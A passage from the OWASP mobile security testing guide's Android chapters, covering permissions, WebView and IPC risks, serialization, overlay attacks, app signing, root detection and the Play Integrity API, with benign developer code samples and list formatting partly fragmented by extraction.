Suppose an app lists both READ_EXTERNAL_STORAGE and WRITE_EXTERNAL_STORAGE in its manifest. The app requests READ_EXTERNAL_STORAGE and the user grants it. If the app targets API level 25 or lower, the system also grants WRITE_EXTERNAL_STORAGE at the same time, because it belongs to the same STORAGE permission group and is also registered in the manifest. If the app targets Android 8.0 (API level 26), the system grants only READ_EXTERNAL_STORAGE at that time; however, if the app later requests WRITE_EXTERNAL_STORAGE, the system immediately grants that privilege without prompting the user.
You can see the list of permission groups in the Android developer documentation. To make this a bit more confusing, Google also warns that particular permissions might be moved from one group to another in future versions of the Android SDK and therefore, the logic of the app shouldn't rely on the structure of these permission groups. The best practice is to explicitly request every permission whenever it's needed.
Android 9 (API Level 28) Changes:
The following changes affect all apps running on Android 9, even to those apps targeting API levels lower than 28.
READ_CALL_LOG
, WRITE_CALL_LOG
, and PROCESS_OUTGOING_CALLS
(dangerous) permissions are moved from PHONE
to the new CALL_LOG
permission group. This means that being able to make phone calls (e.g. by having the permissions of the PHONE
group granted) is not sufficient to get access to the call logs.READ_CALL_LOG
permission when running on Android 9 (API level 28).WifiManager.getConnectionInfo
unless all of the following is true:ACCESS_FINE_LOCATION
or ACCESS_COARSE_LOCATION
permission.ACCESS_WIFI_STATE
permission.Apps targeting Android 9 (API level 28) or higher are affected by the following:
Build.getSerial
) unless the READ_PHONE_STATE
(dangerous) permission is granted.Android 10 (API level 29) Changes:
Android 10 (API level 29) introduces several user privacy enhancements. The changes regarding permissions affect to all apps running on Android 10 (API level 29), including those targeting lower API levels.
READ_FRAME_BUFFER
, CAPTURE_VIDEO_OUTPUT
, and CAPTURE_SECURE_VIDEO_OUTPUT
permissions are now signature-access only, which prevents silent access to the device's screen contents.Activity Permission Enforcement:
Permissions are applied via android:permission
attribute within the <activity>
tag in the manifest. These permissions restrict which applications can start that Activity. The permission is checked during Context.startActivity
and Activity.startActivityForResult
. Not holding the required permission results in a SecurityException
being thrown from the call.
Service Permission Enforcement:
Permissions applied via android:permission
attribute within the <service>
tag in the manifest restrict who can start or bind to the associated Service. The permission is checked during Context.startService
, Context.stopService
and Context.bindService
. Not holding the required permission results in a SecurityException
being thrown from the call.
Broadcast Permission Enforcement:
Permissions applied via android:permission
attribute within the <receiver>
tag restrict access to send broadcasts to the associated BroadcastReceiver
. The held permissions are checked after Context.sendBroadcast
returns, while trying to deliver the sent broadcast to the given receiver. Not holding the required permissions doesn't throw an exception, the result is an unsent broadcast.
A permission can be supplied to Context.registerReceiver
to control who can broadcast to a programmatically registered receiver. Going the other way, a permission can be supplied when calling Context.sendBroadcast
to restrict which broadcast receivers are allowed to receive the broadcast.
Note that both a receiver and a broadcaster can require a permission. When this happens, both permission checks must pass for the intent to be delivered to the associated target. For more information, please reference the section \"Restricting broadcasts with permissions\" in the Android Developers Documentation.
Content Provider Permission Enforcement:
Permissions applied via android:permission
attribute within the <provider>
tag restrict access to data in a ContentProvider. Content providers have an important additional security facility called URI permissions which is described next. Unlike the other components, ContentProviders have two separate permission attributes that can be set, android:readPermission
restricts who can read from the provider, and android:writePermission
restricts who can write to it. If a ContentProvider is protected with both read and write permissions, holding only the write permission does not also grant read permissions.
Permissions are checked when you first retrieve a provider and as operations are performed using the ContentProvider. Using ContentResolver.query
requires holding the read permission; using ContentResolver.insert
, ContentResolver.update
, ContentResolver.delete
requires the write permission. A SecurityException
will be thrown from the call if proper permissions are not held in all these cases.
Content Provider URI Permissions:
The standard permission system is not sufficient when being used with content providers. For example a content provider may want to limit permissions to READ permissions in order to protect itself, while using custom URIs to retrieve information. An application should only have the permission for that specific URI.
The solution is per-URI permissions. When starting or returning a result from an activity, the method can set Intent.FLAG_GRANT_READ_URI_PERMISSION
and/or Intent.FLAG_GRANT_WRITE_URI_PERMISSION
. This grants permission to the activity for the specific URI regardless if it has permissions to access to data from the content provider.
This allows a common capability-style model where user interaction drives ad-hoc granting of fine-grained permission. This can be a key facility for reducing the permissions needed by apps to only those directly related to their behavior. Without this model in place malicious users may access other member's email attachments or harvest contact lists for future use via unprotected URIs. In the manifest the android:grantUriPermissions
attribute or the node help restrict the URIs.
Here you can find more information about APIs related to URI Permissions:
Android allows apps to expose their services/components to other apps. Custom permissions are required for app access to the exposed components. You can define custom permissions in AndroidManifest.xml
by creating a permission tag with two mandatory attributes: android:name
and android:protectionLevel
.
It is crucial to create custom permissions that adhere to the Principle of Least Privilege: permission should be defined explicitly for its purpose, with a meaningful and accurate label and description.
Below is an example of a custom permission called START_MAIN_ACTIVITY
, which is required when launching the TEST_ACTIVITY
Activity.
The first code block defines the new permission, which is self-explanatory. The label tag is a summary of the permission, and the description is a more detailed version of the summary. You can set the protection level according to the types of permissions that will be granted. Once you've defined your permission, you can enforce it by adding it to the application's manifest. In our example, the second block represents the component that we are going to restrict with the permission we created. It can be enforced by adding the android:permission
attributes.
<permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\"\n android:label=\"Start Activity in myapp\"\n android:description=\"Allow the app to launch the activity of myapp app, any app you grant this permission will be able to launch main activity by myapp app.\"\n android:protectionLevel=\"normal\" />\n\n<activity android:name=\"TEST_ACTIVITY\"\n android:permission=\"com.example.myapp.permission.START_MAIN_ACTIVITY\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n</activity>\n
Once the permission START_MAIN_ACTIVITY
has been created, apps can request it via the uses-permission
tag in the AndroidManifest.xml
file. Any application granted the custom permission START_MAIN_ACTIVITY
can then launch the TEST_ACTIVITY
. Please note <uses-permission android:name=\"myapp.permission.START_MAIN_ACTIVITY\" />
must be declared before the <application>
or an exception will occur at runtime. Please see the example below that is based on the permission overview and manifest-intro.
<manifest>\n<uses-permission android:name=\"com.example.myapp.permission.START_MAIN_ACTIVITY\" />\n <application>\n <activity>\n </activity>\n </application>\n</manifest>\n
We recommend using a reverse-domain annotation when registering a permission, as in the example above (e.g. com.domain.application.permission
) in order to avoid collisions with other applications.
WebViews are Android's embedded components which allow your app to open web pages within your application. In addition to mobile apps related threats, WebViews may expose your app to common web threats (e.g. XSS, Open Redirect, etc.).
One of the most important things to do when testing WebViews is to make sure that only trusted content can be loaded in it. Any newly loaded page could be potentially malicious, try to exploit any WebView bindings or try to phish the user. Unless you're developing a browser app, usually you'd like to restrict the pages being loaded to the domain of your app. A good practice is to prevent the user from even having the chance to input any URLs inside WebViews (which is the default on Android) nor navigate outside the trusted domains. Even when navigating on trusted domains there's still the risk that the user might encounter and click on other links to untrustworthy content (e.g. if the page allows for other users to post comments). In addition, some developers might even override some default behavior which can be potentially dangerous for the user.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#safebrowsing-api","title":"SafeBrowsing API","text":"To provide a safer web browsing experience, Android 8.1 (API level 27) introduces the SafeBrowsing API
, which allows your application to detect URLs that Google has classified as a known threat.
By default, WebViews show a warning to users about the security risk with the option to load the URL or stop the page from loading. With the SafeBrowsing API you can customize your application's behavior by either reporting the threat to SafeBrowsing or performing a particular action such as returning back to safety each time it encounters a known threat. Please check the Android Developers documentation for usage examples.
You can use the SafeBrowsing API independently from WebViews using the SafetyNet library, which implements a client for Safe Browsing Network Protocol v4. SafetyNet allows you to analyze all the URLs that your app is supposed load. You can check URLs with different schemes (e.g. http, file) since SafeBrowsing is agnostic to URL schemes, and against TYPE_POTENTIALLY_HARMFUL_APPLICATION
and TYPE_SOCIAL_ENGINEERING
threat types.
When sending URLs or files to be checked for known threats make sure they don't contain sensitive data which could compromise a user's privacy, or expose sensitive content from your application.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#virus-total-api","title":"Virus Total API","text":"Virus Total provides an API for analyzing URLs and local files for known threats. The API Reference is available on Virus Total developers page.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#javascript-execution-in-webviews","title":"JavaScript Execution in WebViews","text":"JavaScript can be injected into web applications via reflected, stored, or DOM-based Cross-Site Scripting (XSS). Mobile apps are executed in a sandboxed environment and don't have this vulnerability when implemented natively. Nevertheless, WebViews may be part of a native app to allow web page viewing. Every app has its own WebView cache, which isn't shared with the native Browser or other apps. On Android, WebViews use the WebKit rendering engine to display web pages, but the pages are stripped down to minimal functions, for example, pages don't have address bars. If the WebView implementation is too lax and allows usage of JavaScript, JavaScript can be used to attack the app and gain access to its data.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#webview-protocol-handlers","title":"WebView Protocol Handlers","text":"Several default schemas are available for Android URLs. They can be triggered within a WebView with the following:
WebViews can load remote content from an endpoint, but they can also load local content from the app data directory or external storage. If the local content is loaded, the user shouldn't be able to influence the filename or the path used to load the file, and users shouldn't be able to edit the loaded file.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#java-objects-exposed-through-webviews","title":"Java Objects Exposed Through WebViews","text":"Android offers a way for JavaScript execution in a WebView to call and use native functions of an Android app (annotated with @JavascriptInterface
) by using the addJavascriptInterface
method. This is known as a WebView JavaScript bridge or native bridge.
Please note that when you use addJavascriptInterface
, you're explicitly granting access to the registered JavaScript Interface object to all pages loaded within that WebView. This implies that, if the user navigates outside your app or domain, all other external pages will also have access to those JavaScript Interface objects which might present a potential security risk if any sensitive data is being exposed though those interfaces.
Warning: Take extreme care with apps targeting Android versions below Android 4.2 (API level 17) as they are vulnerable to a flaw in the implementation of addJavascriptInterface
: an attack that is abusing reflection, which leads to remote code execution when malicious JavaScript is injected into a WebView. This was due to all Java Object methods being accessible by default (instead of only those annotated).
Clearing the WebView resources is a crucial step when an app accesses any sensitive data within a WebView. This includes any files stored locally, the RAM cache and any loaded JavaScript.
As an additional measure, you could use server-side headers such as no-cache
, which prevent an application from caching particular content.
Starting on Android 10 (API level 29) apps are able to detect if a WebView has become unresponsive. If this happens, the OS will automatically call the onRenderProcessUnresponsive
method.
You can find more security best practices when using WebViews on Android Developers.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#deep-links","title":"Deep Links","text":"Deep links are URIs of any scheme that take users directly to specific content in an app. An app can set up deep links by adding intent filters on the Android Manifest and extracting data from incoming intents to navigate users to the correct activity.
Android supports two types of deep links:
myapp://
(not verified by the OS).http://
and https://
schemes and contain the autoVerify
attribute (which triggers OS verification).Deep Link Collision:
Using unverified deep links can cause a significant issue- any other apps installed on a user's device can declare and try to handle the same intent, which is known as deep link collision. Any arbitrary application can declare control over the exact same deep link belonging to another application.
In recent versions of Android this results in a so-called disambiguation dialog shown to the user that asks them to select the application that should handle the deep link. The user could make the mistake of choosing a malicious application instead of the legitimate one.
Android App Links:
In order to solve the deep link collision issue, Android 6.0 (API Level 23) introduced Android App Links, which are verified deep links based on a website URL explicitly registered by the developer. Clicking on an App Link will immediately open the app if it's installed.
There are some key differences from unverified deep links:
http://
and https://
schemes, any other custom URL schemes are not allowed.During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
The following is a list of Android IPC Mechanisms that may expose sensitive data:
Often while dealing with complex flows during app development, there are situations where an app A wants another app B to perform a certain action in the future, on app A's behalf. Trying to implement this by only using Intent
s leads to various security problems, like having multiple exported components. To handle this use case in a secure manner, Android provides the PendingIntent
API.
PendingIntent
are most commonly used for notifications, app widgets, media browser services, etc. When used for notifications, PendingIntent
is used to declare an intent to be executed when a user performs an action with an application's notification. The notification requires a callback to the application to trigger an action when the user clicks on it.
Internally, a PendingIntent
object wraps a normal Intent
object (referred as base intent) that will eventually be used to invoke an action. For example, the base intent specifies that an activity A should be started in an application. The receiving application of the PendingIntent
, will unwrap and retrieve this base intent and invoke the activity A by calling the PendingIntent.send
function.
A typical implementation for using PendingIntent
is below:
Intent intent = new Intent(applicationContext, SomeActivity.class); // base intent\n\n// create a pending intent\nPendingIntent pendingIntent = PendingIntent.getActivity(applicationContext, 0, intent, PendingIntent.FLAG_IMMUTABLE);\n\n// send the pending intent to another app\nIntent anotherIntent = new Intent();\nanotherIntent.setClassName(\"other.app\", \"other.app.MainActivity\");\nanotherIntent.putExtra(\"pendingIntent\", pendingIntent);\nstartActivity(anotherIntent);\n
What makes a PendingIntent
secure is that, unlike a normal Intent
, it grants permission to a foreign application to use the Intent
(the base intent) it contains, as if it were being executed by your application's own process. This allows an application to freely use them to create callbacks without the need to create exported activities.
If not implemented correctly, a malicious application can hijack a PendingIntent
. For example, in the notification example above, a malicious application with android.permission.BIND_NOTIFICATION_LISTENER_SERVICE
can bind to the notification listener service and retrieve the pending intent.
There are certain security pitfalls when implementing PendingIntent
s, which are listed below:
Mutable fields: A PendingIntent
can have mutable and empty fields that can be filled by a malicious application. This can lead to a malicious application gaining access to non-exported application components. Using the PendingIntent.FLAG_IMMUTABLE
flag makes the PendingIntent
immutable and prevents any changes to the fields. Prior to Android 12 (API level 31), the PendingIntent
was mutable by default, while since Android 12 (API level 31) it is changed to immutable by default to prevent accidental vulnerabilities.
Use of implicit intent: A malicious application can receive a PendingIntent
and then update the base intent to target the component and package within the malicious application. As a mitigation, ensure that you explicitly specify the exact package, action and component that will receive the base intent.
The most common case of PendingIntent
attack is when a malicious application is able to intercept it.
For further details, check the Android documentation on using a pending intent.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#implicit-intents","title":"Implicit Intents","text":"An Intent is a messaging object that you can use to request an action from another application component. Although intents facilitate communication between components in a variety of ways, there are three basic use cases: starting an activity, starting a service, and delivering a broadcast.
According to the Android Developers Documentation, Android provides two types of intents:
// Note the specification of a concrete component (DownloadActivity) that is started by the intent.\nIntent downloadIntent = new Intent(this, DownloadActivity.class);\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
// Developers can also start an activity by just setting an action that is matched by the intended app.\nIntent downloadIntent = new Intent();\ndownloadIntent.setAction(\"android.intent.action.GET_CONTENT\")\nstartActivityForResult(downloadIntent);\n
The use of implicit intents can lead to multiple security risks, e.g. if the calling app processes the return value of the implicit intent without proper verification or if the intent contains sensitive data, it can be accidentally leaked to unauthorized third-parties.
You can refer to this blog post, this article and CWE-927 for more information about the mentioned problem, concrete attack scenarios and recommendations.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-persistence","title":"Object Persistence","text":"There are several ways to persist an object on Android:
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#object-serialization","title":"Object Serialization","text":"An object and its data can be represented as a sequence of bytes. This is done in Java via object serialization. Serialization is not inherently secure. It is just a binary format (or representation) for locally storing data in a .ser file. Encrypting and signing HMAC-serialized data is possible as long as the keys are stored safely. Deserializing an object requires a class of the same version as the class used to serialize the object. After classes have been changed, the ObjectInputStream
can't create objects from older .ser files. The example below shows how to create a Serializable
class by implementing the Serializable
interface.
import java.io.Serializable;\n\npublic class Person implements Serializable {\n private String firstName;\n private String lastName;\n\n public Person(String firstName, String lastName) {\n this.firstName = firstName;\n this.lastName = lastName;\n }\n //..\n //getters, setters, etc\n //..\n\n}\n
Now you can read/write the object with ObjectInputStream
/ObjectOutputStream
in another class.
There are several ways to serialize the contents of an object to JSON. Android comes with the JSONObject
and JSONArray
classes. A wide variety of libraries, including GSON, Jackson, Moshi, can also be used. The main differences between the libraries are whether they use reflection to compose the object, whether they support annotations, whether the create immutable objects, and the amount of memory they use. Note that almost all the JSON representations are String-based and therefore immutable. This means that any secret stored in JSON will be harder to remove from memory. JSON itself can be stored anywhere, e.g., a (NoSQL) database or a file. You just need to make sure that any JSON that contains secrets has been appropriately protected (e.g., encrypted/HMACed). See the chapter \"Data Storage on Android\" for more details. A simple example (from the GSON User Guide) of writing and reading JSON with GSON follows. In this example, the contents of an instance of the BagOfPrimitives
is serialized into JSON:
class BagOfPrimitives {\n private int value1 = 1;\n private String value2 = \"abc\";\n private transient int value3 = 3;\n BagOfPrimitives() {\n // no-args constructor\n }\n}\n\n// Serialization\nBagOfPrimitives obj = new BagOfPrimitives();\nGson gson = new Gson();\nString json = gson.toJson(obj);\n\n// ==> json is {\"value1\":1,\"value2\":\"abc\"}\n
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#xml","title":"XML","text":"There are several ways to serialize the contents of an object to XML and back. Android comes with the XmlPullParser
interface which allows for easily maintainable XML parsing. There are two implementations within Android: KXmlParser
and ExpatPullParser
. The Android Developer Guide provides a great write-up on how to use them. Next, there are various alternatives, such as a SAX
parser that comes with the Java runtime. For more information, see a blogpost from ibm.com. Similarly to JSON, XML has the issue of working mostly String based, which means that String-type secrets will be harder to remove from memory. XML data can be stored anywhere (database, files), but do need additional protection in case of secrets or information that should not be changed. See the chapter \"Data Storage on Android\" for more details. As stated earlier: the true danger in XML lies in the XML eXternal Entity (XXE) attack as it might allow for reading external data sources that are still accessible within the application.
There are libraries that provide functionality for directly storing the contents of an object in a database and then instantiating the object with the database contents. This is called Object-Relational Mapping (ORM). Libraries that use the SQLite database include
Realm, on the other hand, uses its own database to store the contents of a class. The amount of protection that ORM can provide depends primarily on whether the database is encrypted. See the chapter \"Data Storage on Android\" for more details. The Realm website includes a nice example of ORM Lite.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#parcelable","title":"Parcelable","text":"Parcelable
is an interface for classes whose instances can be written to and restored from a Parcel
. Parcels are often used to pack a class as part of a Bundle
for an Intent
. Here's an Android developer documentation example that implements Parcelable
:
public class MyParcelable implements Parcelable {\n private int mData;\n\n public int describeContents() {\n return 0;\n }\n\n public void writeToParcel(Parcel out, int flags) {\n out.writeInt(mData);\n }\n\n public static final Parcelable.Creator<MyParcelable> CREATOR\n = new Parcelable.Creator<MyParcelable>() {\n public MyParcelable createFromParcel(Parcel in) {\n return new MyParcelable(in);\n }\n\n public MyParcelable[] newArray(int size) {\n return new MyParcelable[size];\n }\n };\n\n private MyParcelable(Parcel in) {\n mData = in.readInt();\n }\n }\n
Because this mechanism that involves Parcels and Intents may change over time, and the Parcelable
may contain IBinder
pointers, storing data to disk via Parcelable
is not recommended.
Protocol Buffers by Google, are a platform- and language neutral mechanism for serializing structured data by means of the Binary Data Format. There have been a few vulnerabilities with Protocol Buffers, such as CVE-2015-5237. Note that Protocol Buffers do not provide any protection for confidentiality: there is no built in encryption.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#overlay-attacks","title":"Overlay Attacks","text":"Screen overlay attacks occur when a malicious application manages to put itself on top of another application which remains working normally as if it were on the foreground. The malicious app might create UI elements mimicking the look and feel and the original app or even the Android system UI. The intention is typically to make users believe that they keep interacting with the legitimate app and then try to elevate privileges (e.g by getting some permissions granted), stealthy phishing, capture user taps and keystrokes etc.
There are several attacks affecting different Android versions including:
SYSTEM_ALERT_WINDOW
(\"draw on top\") and BIND_ACCESSIBILITY_SERVICE
(\"a11y\") permissions that, in case the app is installed from the Play Store, the users do not need to explicitly grant and for which they are not even notified.Usually, this kind of attacks are inherent to an Android system version having certain vulnerabilities or design issues. This makes them challenging and often virtually impossible to prevent unless the app is upgraded targeting a safe Android version (API level).
Over the years many known malware like MazorBot, BankBot or MysteryBot have been abusing the screen overlay feature of Android to target business critical applications, namely in the banking sector. This blog discusses more about this type of malware.
"},{"location":"MASTG/Android/0x05h-Testing-Platform-Interaction/#enforced-updating","title":"Enforced Updating","text":"Starting from Android 5.0 (API level 21), together with the Play Core Library, apps can be forced to be updated. This mechanism is based on using the AppUpdateManager
. Before that, other mechanisms were used, such as doing http calls to the Google Play Store, which are not as reliable as the APIs of the Play Store might change. Alternatively, Firebase could be used to check for possible forced updates as well (see this blog). Enforced updating can be really helpful when it comes to public key pinning (see the Testing Network communication for more details) when a pin has to be refreshed due to a certificate/public key rotation. Next, vulnerabilities are easily patched by means of forced updates.
Please note that newer versions of an application will not fix security issues that are living in the backends to which the app communicates. Allowing an app not to communicate with it might not be enough. Having proper API-lifecycle management is key here. Similarly, when a user is not forced to update, do not forget to test older versions of your app against your API and/or use proper API versioning.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/","title":"Android Code Quality and Build Settings","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#app-signing","title":"App Signing","text":"Android requires all APKs to be digitally signed with a certificate before they are installed or run. The digital signature is used to verify the owner's identity for application updates. This process can prevent an app from being tampered with or modified to include malicious code.
When an APK is signed, a public-key certificate is attached to it. This certificate uniquely associates the APK with the developer and the developer's private key. When an app is being built in debug mode, the Android SDK signs the app with a debug key created specifically for debugging purposes. An app signed with a debug key is not meant to be distributed and won't be accepted in most app stores, including the Google Play Store.
The final release build of an app must be signed with a valid release key. In Android Studio, the app can be signed manually or via creation of a signing configuration that's assigned to the release build type.
Prior Android 9 (API level 28) all app updates on Android need to be signed with the same certificate, so a validity period of 25 years or more is recommended. Apps published on Google Play must be signed with a key that that has a validity period ending after October 22th, 2033.
Three APK signing schemes are available:
The v2 signature, which is supported by Android 7.0 (API level 24) and above, offers improved security and performance compared to v1 scheme. The V3 signature, which is supported by Android 9 (API level 28) and above, gives apps the ability to change their signing keys as part of an APK update. This functionality assures compatibility and apps continuous availability by allowing both the new and the old keys to be used. Note that it is only available via apksigner at the time of writing.
For each signing scheme the release builds should always be signed via all its previous schemes as well.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"Android apps often make use of third party libraries. These third party libraries accelerate development as the developer has to write less code in order to solve a problem. There are two categories of libraries:
Mockito
used for testing and libraries like JavaAssist
used to compile certain other libraries.Okhttp3
.These libraries can lead to unwanted side-effects:
OKHTTP
prior to 2.7.5 in which TLS chain pollution was possible to bypass SSL pinning.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/Android/0x05i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"Android applications run on a VM where most of the memory corruption issues have been taken care off. This does not mean that there are no memory corruption bugs. Take CVE-2018-9522 for instance, which is related to serialization issues using Parcels. Next, in native code, we still see the same issues as we explained in the general memory corruption section. Last, we see memory bugs in supporting services, such as with the Stagefright attack as shown at BlackHat.
Memory leaks are often an issue as well. This can happen for instance when a reference to the Context
object is passed around to non-Activity
classes, or when you pass references to Activity
classes to your helper classes.
Detecting the presence of binary protection mechanisms heavily depend on the language used for developing the application.
In general all binaries should be tested, which includes both the main app executable as well as all libraries/dependencies. However, on Android we will focus on native libraries since the main executables are considered safe as we will see next.
Android optimizes its Dalvik bytecode from the app DEX files (e.g. classes.dex) and generates a new file containing the native code, usually with an .odex, .oat extension. This Android compiled binary is wrapped using the ELF format which is the format used by Linux and Android to package assembly code.
The app's NDK native libraries also use the ELF format.
Learn more:
Debugging is an essential process for developers to identify and fix errors or bugs in their Android app. By using a debugger, developers can select the device to debug their app on and set breakpoints in their Java, Kotlin, and C/C++ code. This allows them to analyze variables and evaluate expressions at runtime, which helps them to identify the root cause of many issues. By debugging their app, developers can improve the functionality and user experience of their app, ensuring that it runs smoothly without any errors or crashes.
Every debugger-enabled process runs an extra thread for handling JDWP protocol packets. This thread is started only for apps that have the android:debuggable=\"true\"
attribute in the Application
element within the Android Manifest.
Generally, you should provide compiled code with as little explanation as possible. Some metadata, such as debugging information, line numbers, and descriptive function or method names, make the binary or bytecode easier for the reverse engineer to understand, but these aren't needed in a release build and can therefore be safely omitted without impacting the app's functionality.
To inspect native binaries, use a standard tool like nm
or objdump
to examine the symbol table. A release build should generally not contain any debugging symbols. If the goal is to obfuscate the library, removing unnecessary dynamic symbols is also recommended.
StrictMode is a developer tool for detecting violations, e.g. accidental disk or network access on the application's main thread. It can also be used to check for good coding practices, such as implementing performant code.
Here is an example of StrictMode
with policies enabled for disk and network access to the main thread:
public void onCreate() {\n if (DEVELOPER_MODE) {\n StrictMode.setThreadPolicy(new StrictMode.ThreadPolicy.Builder()\n .detectDiskReads()\n .detectDiskWrites()\n .detectNetwork() // or .detectAll() for all detectable problems\n .penaltyLog()\n .build());\n StrictMode.setVmPolicy(new StrictMode.VmPolicy.Builder()\n .detectLeakedSqlLiteObjects()\n .detectLeakedClosableObjects()\n .penaltyLog()\n .penaltyDeath()\n .build());\n }\n super.onCreate();\n }\n
Inserting the policy in the if
statement with the DEVELOPER_MODE
condition is recommended. To disable StrictMode
, DEVELOPER_MODE
must be disabled for the release build.
Exceptions occur when an application gets into an abnormal or error state. Both Java and C++ may throw exceptions. Testing exception handling is about ensuring that the app will handle an exception and transition to a safe state without exposing sensitive information via the UI or the app's logging mechanisms.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/","title":"Android Anti-Reversing Defenses","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":""},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#general-disclaimer","title":"General Disclaimer","text":"The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
In the context of anti-reversing, the goal of root detection is to make running the app on a rooted device a bit more difficult, which in turn blocks some of the tools and techniques reverse engineers like to use. Like most other defenses, root detection is not very effective by itself, but implementing multiple root checks that are scattered throughout the app can improve the effectiveness of the overall anti-tampering scheme.
For Android, we define \"root detection\" a bit more broadly, including custom ROMs detection, i.e., determining whether the device is a stock Android build or a custom build.
In the following section, we list some common root detection methods you'll encounter. You'll find some of these methods implemented in the OWASP UnCrackable Apps for Android that accompany the OWASP Mobile Testing Guide.
Root detection can also be implemented through libraries such as RootBeer.
"},{"location":"MASTG/Android/0x05j-Testing-Resiliency-Against-Reverse-Engineering/#google-play-integrity","title":"Google Play Integrity","text":"Google has launched the Google Play Integrity API to improve the security and integrity of apps and games on Android starting with Android 4.4 (level 19). The previous official API, SafetyNet, did not cover all the security needs that Google wanted for the platform, so Play Integrity was developed with the basic functions of the previous API and integrated additional features. This change aims to protect users from dangerous and fraudulent interactions.
Google Play Integrity offers the following safeguards:
The API provides four macro categories of information to help the security team make a decision. These categories include:
Request Details: In this section, details are obtained about the app package that requested the integrity check, including its format (e.g., com.example.myapp), a base64-encoded ID provided by the developer to link the request with the integrity certificate, and the execution time of the request in milliseconds.
App Integrity: This section provides information about the integrity of the app, including the result of the verification (denominated verdict), which indicates whether the app's installation source is trusted (via Play Store) or unknown/suspicious. If the installation source is considered secure, the app version will also be displayed.
Account Details: This category provides information about the app licensing status. The result can be LICENSED
, indicating that the user purchased or installed the app on the Google Play Store; UNLICENSED
, meaning that the user does not own the app or did not acquire it through the Google Play Store; or UNEVALUATED
, which means that the licensing details could not be evaluated because a necessary requirement is missing, that is, the device may not be trustworthy enough or the installed app version is not recognized by the Google Play Store.
Device Integrity: This section presents information that verifies the authenticity of the Android environment in which the app is running.
MEETS_DEVICE_INTEGRITY
: The app is on an Android device with Google Play Services, passing system integrity checks and compatibility requirements.
MEETS_BASIC_INTEGRITY
: The app is on a device that may not be approved to run Google Play Services but passes basic integrity checks, possibly due to an unrecognized Android version, unlocked bootloader, or lack of manufacturer certification.MEETS_STRONG_INTEGRITY
: The app is on a device with Google Play Services, ensuring robust system integrity with features like hardware-protected boot.MEETS_VIRTUAL_INTEGRITY
: The app runs in an emulator with Google Play Services, passing system integrity checks and meeting Android compatibility requirements.API Errors:
The API can return local errors such as APP_NOT_INSTALLED
and APP_UID_MISMATCH
, which can indicate a fraud attempt or attack. In addition, outdated Google Play Services or Play Store can also cause errors, and it is important to check these situations to ensure proper integrity verification functionality and to ensure the environment is not intentionally set up for an attack. You can find more details on the official page.
Best practices:
Minimize queries to the Play Protect API to reduce device resource impact. For example, employ the API only for essential device integrity verifications.
Include a NONCE
with integrity verification requests. This random value, generated by the app or server, helps the verification server confirm that responses match the original requests without third-party tampering.
Limitations: The default daily limit for Google Play Services Integrity Verification API requests is 10,000 requests per day. Applications needing more must contact Google to request an increased limit.
Example Request:
